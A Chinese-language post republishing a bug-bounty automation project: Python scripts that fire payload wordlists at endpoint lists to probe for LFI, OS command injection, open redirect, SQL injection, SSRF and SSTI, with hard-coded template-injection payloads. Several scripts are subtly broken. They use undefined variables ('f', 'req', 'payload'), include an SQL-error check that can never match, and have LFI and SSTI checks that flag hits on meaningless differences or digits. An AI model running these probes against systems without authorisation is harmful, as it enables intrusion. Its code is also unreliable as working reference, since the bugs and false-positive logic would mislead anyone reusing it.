漏洞赏金自动化工具 (包含LFI、OS命令执行、重定向、SQL注入、SSRF、SSTI攻击)

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/Mostafa-Elguerdawi/Automation_Bug_Hunting

本地文件包含漏洞(LFI)

LFI.py

import requests
import threading

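# Load the LFI wordlist, one payload per line.
# The file is closed deterministically, splitlines() copes with CRLF
# wordlists, and blank lines are dropped: a trailing newline would otherwise
# produce an empty payload that merely re-requests every endpoint.
# NOTE(review): this absolute path belongs to the original author's machine;
# it has to be changed to a local copy of LFI.txt before the script can run.
with open('/home/melguerdawi/Desktop/Pentest/Web/hunt/Automation/LFI/LFI.txt', 'r') as wordlist:
    payloads = [line for line in wordlist.read().splitlines() if line]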

def test_lfi(url, payload):
    for u in url:
        al = f"{u}{payload}"
        payload_response = requests.get(al)
        normal_response = requests.get(al)
    
        if len(payload_response.text) > len(normal_response.text):
            print(f"LFI vulnerability found with payload: {al}")
            lfi = open('/home/melguerdawi/Desktop/Pentest/Web/hunt/Automation/LFI/LFI_results.txt', 'a')
            f.write(f"{al}\n")


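# Ask for the path of a file holding one endpoint per line.
ur = input("Enter EndPoints Path >>> ")
with open(ur, 'r') as endpoints_file:
    # splitlines() handles CRLF files; blank lines are dropped so that no
    # request is built from an empty endpoint.
    url = [line for line in endpoints_file.read().splitlines() if line.strip()]

# One worker thread per payload; each worker walks the whole endpoint list.
# NOTE(review): the thread count equals the wordlist size, so a large
# wordlist means that many simultaneous connections. A bounded pool
# (concurrent.futures.ThreadPoolExecutor) would keep the request rate within
# what the tested programme allows.
threads = []
for payload in payloads:
    t = threading.Thread(target=test_lfi, args=(url, payload))
    threads.append(t)
    t.start()

# Block until every worker has finished.
for t in threads:
    t.join()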

LFI.txt字典

OS命令执行

OS_Injection.py

import threading
import requests


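# Load the command-injection wordlist (OS.txt in the working directory),
# one payload per line. The handle is closed after reading, CRLF endings are
# handled by splitlines(), and blank lines are dropped so that no "empty
# payload" run checks the unmodified pages against the marker list.
with open('OS.txt', 'r') as wordlist:
    payloads = [line for line in wordlist.read().splitlines() if line]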

def test_os_cmd_injection(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if "uid" in r.text or "root" in r.text or "list" in r.text or "-rw" in r.text or "www-data" in r.text or "passwd" in r.text or "Local Address" in req.text or "System" in r.text or "C:" in r.text or "apache" in req.text:
                print(f"[+] OS Command Injection found: {url}{payload}")
                with open("os_cmd_injection_results.txt", "a") as f:
                    f.write(f"{al}\n")
    except:
        pass


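# Ask for the path of a file holding one endpoint per line.
ur = input("Enter EndPoints Path >>> ")
# The original opened the literal file name 'ur' instead of the path that
# was just entered, so the prompt had no effect.
with open(ur, 'r') as endpoints_file:
    # Blank lines are dropped so that no request is built from an empty endpoint.
    url = [line for line in endpoints_file.read().splitlines() if line.strip()]

# One worker thread per payload; each worker walks the whole endpoint list.
# NOTE(review): the thread count equals the wordlist size; a bounded pool
# (concurrent.futures.ThreadPoolExecutor) would cap the number of
# simultaneous connections.
threads = []
for payload in payloads:
    t = threading.Thread(target=test_os_cmd_injection, args=(url, payload))
    threads.append(t)
    t.start()

# Block until every worker has finished.
for t in threads:
    t.join()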

OS.txt

重定向漏洞

Open_Redirect.py

import threading
import requests


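# Load the open-redirect wordlist (Open_Redirect.txt in the working
# directory), one payload per line. The handle is closed after reading,
# CRLF endings are handled by splitlines(), and blank lines are dropped.
with open('Open_Redirect.txt', 'r') as wordlist:
    payloads = [line for line in wordlist.read().splitlines() if line]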

def test_open_redirect(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if r.status_code == 200:
                if r.url != url:
                    print(f"[+] Open Redirect found: {al}")
                    with open("open_redirect_results.txt", "a") as f:
                        f.write(f"{al}\n")
    except:
        pass


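# Ask for the path of a file holding one endpoint per line.
ur = input("Enter EndPoints Path >>> ")
with open(ur, 'r') as endpoints_file:
    # splitlines() handles CRLF files; blank lines are dropped so that no
    # request is built from an empty endpoint.
    url = [line for line in endpoints_file.read().splitlines() if line.strip()]

# One worker thread per payload; each worker walks the whole endpoint list.
# NOTE(review): the thread count equals the wordlist size; a bounded pool
# (concurrent.futures.ThreadPoolExecutor) would cap the number of
# simultaneous connections.
threads = []
for payload in payloads:
    t = threading.Thread(target=test_open_redirect, args=(url, payload))
    threads.append(t)
    t.start()

# Block until every worker has finished.
for t in threads:
    t.join()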

Open_Redirect.txt

SQL注入

SQLI.py

import threading
import requests


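# Load the SQL-injection wordlist (SQLI.txt in the working directory), one
# payload per line. The handle is closed after reading, CRLF endings are
# handled by splitlines(), and blank lines are dropped so that unmodified
# pages are not checked against the error markers.
with open('SQLI.txt', 'r') as wordlist:
    payloads = [line for line in wordlist.read().splitlines() if line]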

def test_sql_injection(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if "SQL" in r.text.upper() or "Error" in r.text.lower():
                print(f"[+] SQL Injection found: {al}")
                sqli = open('SQLI_result.txt', 'a')
                sqli.write(f"{al}\n")
                
    except Exception as e:
        print(e)

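# Ask for the path of a file holding one endpoint per line.
ur = input("Enter EndPoints Path >>> ")
with open(ur, 'r') as endpoints_file:
    # splitlines() handles CRLF files; blank lines are dropped so that no
    # request is built from an empty endpoint.
    url = [line for line in endpoints_file.read().splitlines() if line.strip()]

# One worker thread per payload; each worker walks the whole endpoint list.
# NOTE(review): the thread count equals the wordlist size; a bounded pool
# (concurrent.futures.ThreadPoolExecutor) would cap the number of
# simultaneous connections.
threads = []
for payload in payloads:
    t = threading.Thread(target=test_sql_injection, args=(url, payload))
    threads.append(t)
    t.start()

# Block until every worker has finished.
for t in threads:
    t.join()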

SQLI.txt

SSRF攻击

SSRF.py

import threading
import requests

# Values appended to each endpoint by the SSRF check.
# Both entries are empty strings in the published script, so as written the
# tool requests the bare endpoints; the user is expected to fill them in.
urls = [
    '',
    '',
]

def test_ssrf(url, test_url):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if r.status_code == 200:
                print(f"[+] SSRF found: {al}")
                ssrf = open('SSRF_results.txt', 'a')
                ssrf.write(f"{al}\n")
            
    except Exception as e:
        print(e)


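# Ask for the path of a file holding one endpoint per line.
ur = input("Enter EndPoints Path >>> ")
with open(ur, 'r') as endpoints_file:
    # splitlines() handles CRLF files; blank lines are dropped so that no
    # request is built from an empty endpoint.
    url = [line for line in endpoints_file.read().splitlines() if line.strip()]

# One worker thread per entry in `urls`; each worker walks the whole
# endpoint list.
threads = []
for test_url in urls:
    t = threading.Thread(target=test_ssrf, args=(url, test_url))
    threads.append(t)
    t.start()

# Block until every worker has finished.
for t in threads:
    t.join()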

SSTI攻击

SSTI.py

import threading
import requests


# Template-expression probes written in several delimiter styles.
# The checker in this script looks for "49", "14", "config" or "7777777" in
# the response, i.e. for an expression that was evaluated, not echoed.
payloads = [
    "{{7*7}}",
    "{{7+7}}",
    "{{config.items()}}",
    "{{7*'7'}}",
    "<%= 7 * 7 %>",
    "${7*7}",
    "${{7*7}}",
    "@(7+7)",
    "#{7*7}",
    "#{ 7 * 7 }",
]


def test_ssti(url, payload):
    try:
        for u in url:
            al = f"{u}{payload}"
            r = requests.get(al)
            if "49" in r.text or "14" in r.text or "config" in r.text or "7777777" in r.text:
                print(f"[+] SSTI found: {al}")
                with open("ssti_results.txt", "a") as f:
                    f.write(f"{al}\n")
    except:
        pass


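# Ask for the path of a file holding one endpoint per line.
ur = input("Enter EndPoints Path >>> ")
with open(ur, 'r') as endpoints_file:
    # splitlines() handles CRLF files; blank lines are dropped so that no
    # request is built from an empty endpoint.
    url = [line for line in endpoints_file.read().splitlines() if line.strip()]

# One worker thread per payload; each worker walks the whole endpoint list.
threads = []
for payload in payloads:
    t = threading.Thread(target=test_ssti, args=(url, payload))
    threads.append(t)
    t.start()

# Block until every worker has finished.
for t in threads:
    t.join()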

 

 

标签:工具分享, 漏洞赏金